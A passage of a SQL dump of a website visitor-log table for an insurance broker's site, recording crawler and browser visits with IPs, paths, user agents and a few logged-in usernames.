+http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8157,'0b_8df2ff4228bbffaffb3afa6b5b1f3ec9','1458680632','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8160,'0b_02090d4a08ec6719770b7213180ccd4b','1458681040','100.43.90.8','spider-100-43-90-8.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(8162,'0b_6bb54914f59cd18d51a00902e02823ac','1458681150','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(8163,'0b_6bb54914f59cd18d51a00902e02823ac','1458681152','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(8166,'0b_02090d4a08ec6719770b7213180ccd4b','1458681389','100.43.90.10','spider-100-43-90-10.yandex.com','/?p=309','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8168,'0b_02090d4a08ec6719770b7213180ccd4b','1458681393','100.43.90.11','spider-100-43-90-11.yandex.com','/term-quotes/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8171,'0b_67e22461ae2156fecc5a3e621c6f4f6e','1458684774','180.76.15.149','baiduspider-180-76-15-149.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(8174,'0b_3d5eebf7c26c1cbd6ea45a5f8a7a8d60','1458688241','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(8175,'0b_3d5eebf7c26c1cbd6ea45a5f8a7a8d60','1458688298','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(8177,'0b_3d5eebf7c26c1cbd6ea45a5f8a7a8d60','1458688301','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(8180,'0b_3d5eebf7c26c1cbd6ea45a5f8a7a8d60','1458688327','75.99.37.250','ool-4b6325fa.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(8183,'0b_3d5eebf7c26c1cbd6ea45a5f8a7a8d60','1458688336','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/case-status/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(8186,'0b_3d5eebf7c26c1cbd6ea45a5f8a7a8d60','1458688345','75.99.37.250','ool-4b6325fa.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(8187,'0b_e29ff517311aaa9ed32c3cc677d8aa11','1458690288','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(8190,'0b_6bc752032fc016e2ac235395b18661d8','1458691760','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8193,'0b_108eac4381b142f3d51738cd12e7a5c8','1458693005','40.77.167.58','msnbot-40-77-167-58.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8195,'0b_d63ae39f18be0f3d247869172e212658','1458694693','180.76.15.6','baiduspider-180-76-15-6.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(8196,'0b_51ac3050b56f7f4daa4e8320e39d832b','1458695459','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)','http://pronekut.com/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(8199,'0b_51ac3050b56f7f4daa4e8320e39d832b','1458695459','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)','http://pronekut.com/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(8202,'0b_13bf29e7a8b850e76ed2e32762331244','1458696102','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8205,'0b_8529b7f1258465edb0e25e896ba4470d','1458700384','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8208,'0b_d827332e3190e632bd18801f60260778','1458700385','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8210,'0b_d827332e3190e632bd18801f60260778','1458700398','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8213,'0b_5d72548b6b2da755b29b70400a6e70ca','1458702313','54.158.135.224','ec2-54-158-135-224.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)','','',0,'WinVista','Firefox 3','us','','','','','','','0','0',0),(8216,'0b_6a19118297caa8befce13210957d1b6a','1458702463','5.9.111.70','static.70.111.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8217,'0b_6a19118297caa8befce13210957d1b6a','1458702466','5.9.111.70','static.70.111.9.5.clients.your-server.de','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8219,'0b_6a19118297caa8befce13210957d1b6a','1458702467','5.9.111.70','static.70.111.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8220,'0b_6a19118297caa8befce13210957d1b6a','1458702468','5.9.111.70','static.70.111.9.5.clients.your-server.de','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8222,'0b_6a19118297caa8befce13210957d1b6a','1458702470','5.9.111.70','static.70.111.9.5.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8225,'0b_dd3697559627b97f082abd0e22f4c43d','1458702730','207.46.13.117','msnbot-207-46-13-117.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8226,'0b_7bc510034aa3dd2b9da76486d71c4ebf','1458703137','45.55.229.176','45.55.229.176','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','','','','','','','','0','0',0),(8228,'0b_dd3697559627b97f082abd0e22f4c43d','1458703246','207.46.13.120','msnbot-207-46-13-120.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8231,'0b_712f8c263419c9298720782c505f4cb7','1458703705','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8234,'0b_712f8c263419c9298720782c505f4cb7','1458703706','68.180.230.123','b115363.yse.yahoo.net','/agent-tools/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8237,'0b_edbbe7d6fa26df53f051a09dd857c807','1458704479','68.180.230.123','b115363.yse.yahoo.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8238,'0b_4b91431a55219040ba2df53f98e1ce77','1458704604','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8241,'0b_4b91431a55219040ba2df53f98e1ce77','1458704608','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8243,'0b_a2af9f35c9b85ed4d671d360216345cd','1458705681','68.180.230.123','b115363.yse.yahoo.net','/SSO/235_29.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8246,'0b_d8f3e4d62cb66deb0f55a10dfcf16161','1458705968','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8249,'0b_d8f3e4d62cb66deb0f55a10dfcf16161','1458707006','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8252,'0b_b33992c3f85e0a1612d4573df0152030','1458708054','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8255,'0b_b33992c3f85e0a1612d4573df0152030','1458709123','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8256,'0b_de9a9a553a37af5c70a335a8d184a187','1458710158','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8259,'0b_ca95f790f8436ae780a347aa4b5f5f51','1458710380','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8261,'0b_1117f9ad6324331d51a3b66fcbe8c141','1458711322','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8264,'0b_1117f9ad6324331d51a3b66fcbe8c141','1458712331','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8265,'0b_8f56462549113f5c316b4eceeb6477dd','1458713265','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8268,'0b_bbd01ba6e7d6cf92e70e12b1c7ed7bd3','1458714064','62.212.73.49','62.212.73.49','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36','http://empireins.com/','',0,'Win7','Chrome 44','us','','','','','','','0','0',0),(8271,'0b_8f56462549113f5c316b4eceeb6477dd','1458714253','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8273,'0b_8973edf658cd0118186a9a77a43edb72','1458715578','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8276,'0b_7f33cb0d2b0c0b09f2a639ac8b228fa4','1458716557','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8277,'0b_d2a06d5d9758a5a87a400576a80eb93e','1458717398','121.214.127.15','cpe-121-214-127-15.lnse4.lon.bigpond.net.au','/','Mozilla/5.0 (Windows NT 6.3; ARM; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.windowssearch.com:80/search?q=empire+insurance+brokers&cc=AU&setlang=en-GB&inlang=en-AU&adlt=moderate&scale=140&contrast=none&hw=1080%2C1920&displaymode=Horizontal&QS=AS&PQ=empire+insurance&SC=6-11&SP=1&SK=AS1&CVID=8282FEBD007C4DA8990E640DE2D5847A&form=WBMSAS','empire+insurance+brokers',1,'WinRT','IE 11','au','1280 x 720','www.windowssearch.com:80','','','','','0','0',0),(8280,'0b_d2a06d5d9758a5a87a400576a80eb93e','1458717404','121.214.127.15','cpe-121-214-127-15.lnse4.lon.bigpond.net.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; ARM; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'WinRT','IE 11','au','1280 x 720','','','','','','0','0',0),(8283,'0b_7f33cb0d2b0c0b09f2a639ac8b228fa4','1458717465','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8286,'0b_d2a06d5d9758a5a87a400576a80eb93e','1458717475','121.214.127.15','cpe-121-214-127-15.lnse4.lon.bigpond.net.au','/about-us/','Mozilla/5.0 (Windows NT 6.3; ARM; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'WinRT','IE 11','au','1280 x 720','','','','','','0','0',0),(8288,'0b_d2a06d5d9758a5a87a400576a80eb93e','1458717559','121.214.127.15','cpe-121-214-127-15.lnse4.lon.bigpond.net.au','/browserconfig.xml','Mozilla/5.0 (Windows NT 6.3; ARM; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'WinRT','IE 11','au','1280 x 720','','','','','','0','0',0),(8291,'0b_a8e4a0df8c5c0188b2baa34ec3828420','1458718552','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8294,'0b_a8e4a0df8c5c0188b2baa34ec3828420','1458719545','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8297,'0b_746f63be16f3c5bf5c3d76c00f9da881','1458720482','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8300,'0b_746f63be16f3c5bf5c3d76c00f9da881','1458720488','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8303,'0b_6437e2015e0e0a8b35daaaa83c067dd8','1458722057','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8304,'0b_6437e2015e0e0a8b35daaaa83c067dd8','1458723413','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8307,'0b_5d804e6bb041d6f6fe036a2be4d80e2a','1458724856','207.46.13.117','msnbot-207-46-13-117.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8310,'0b_4be375f97695e8950e7f343672664225','1458725037','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8312,'0b_acf46d286ce31f27eb3f12976d90537f','1458726511','66.249.73.194','crawl-66-249-73-194.googlebot.com','/products.html','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8313,'0b_236b25c6a4243fd562b7c1f3d3b5bae2','1458727322','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8316,'0b_236b25c6a4243fd562b7c1f3d3b5bae2','1458727323','68.180.230.123','b115363.yse.yahoo.net','/feed/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8319,'0b_b01a7aedfd6edb29a3ba1c5d66e00f6e','1458728085','66.249.73.169','crawl-66-249-73-169.googlebot.com','/agent-tools/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8322,'0b_5511eb039e5c58c7efc25a6b63947f19','1458730569','207.46.13.120','msnbot-207-46-13-120.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8324,'0b_d57036edf8dfd1f4c6a745cc7dac35b1','1458734172','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8325,'0b_d57036edf8dfd1f4c6a745cc7dac35b1','1458734182','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8328,'0b_d57036edf8dfd1f4c6a745cc7dac35b1','1458734193','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8330,'0b_8d4102b340d75d0a34b8781ed90b4246','1458736333','68.180.230.123','b115363.yse.yahoo.net','/igo/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8331,'0b_cb6f97a667751bcf78d58b21b4678fa7','1458736524','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8333,'0b_c064997159e03d9bc7f0a3f5d9d80b75','1458738020','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8334,'0b_9f6743f98b74080d667d1c716c1e3361','1458738256','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(8336,'0b_9f6743f98b74080d667d1c716c1e3361','1458738257','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(8337,'0b_b65dc7fce8658754a207a3361392d4a1','1458739447','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8340,'0b_f2fce4947507b97aaab28df1db581b3c','1458739453','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(8342,'0b_f2fce4947507b97aaab28df1db581b3c','1458739461','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(8345,'0b_f2fce4947507b97aaab28df1db581b3c','1458739466','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(8348,'0b_64d2a5f0203ac25db0d8a32a27ed2a4b','1458739839','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8349,'0b_64d2a5f0203ac25db0d8a32a27ed2a4b','1458739840','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8351,'0b_a07c2ad614931a6965f3d7a90c00f947','1458741531','68.180.230.123','b115363.yse.yahoo.net','/register/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8354,'0b_25196a8a41067544485d94f3026b5342','1458743736','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8357,'0b_b3497971632df11caf8145beb138658d','1458744584','188.163.78.47','sol-fttb.47.78.163.188.sovam.net.ua','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','0','0',0),(8358,'0b_b3497971632df11caf8145beb138658d','1458744585','188.163.78.47','sol-fttb.47.78.163.188.sovam.net.ua','/?author=1','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','0','0',0),(8360,'0b_3d4389fa3c35a7efde8a960c1620dba1','1458745433','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8363,'0b_3d4389fa3c35a7efde8a960c1620dba1','1458745437','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8366,'0b_3d4389fa3c35a7efde8a960c1620dba1','1458745439','69.175.22.218','newscan02.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8369,'0b_3d4389fa3c35a7efde8a960c1620dba1','1458745448','69.175.22.218','newscan02.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8370,'0b_3d4389fa3c35a7efde8a960c1620dba1','1458745451','69.175.22.218','newscan02.sitelock.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8373,'0b_b38e08fa06b63bfb88c185533db7f538','1458746663','66.249.83.213,75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(8375,'0b_ca0a30cc962d96230022387db0022cce','1458749089','180.76.15.146','baiduspider-180-76-15-146.crawl.baidu.com','/contact/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(8378,'0b_554fa57c7078a546687f9327aa173406','1458750720','178.63.17.167','seo-de01.mcemcw.com','/','Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10','','',0,'Win7','Firefox 3','ru','','','','','','','0','0',0),(8379,'0b_444ab639b7116ff72d54fb734b316c18','1458750992','62.210.143.245','mj8.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8382,'0b_444ab639b7116ff72d54fb734b316c18','1458750994','62.210.143.245','mj8.naefmarco.ch','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8384,'0b_444ab639b7116ff72d54fb734b316c18','1458750995','62.210.143.245','mj8.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; 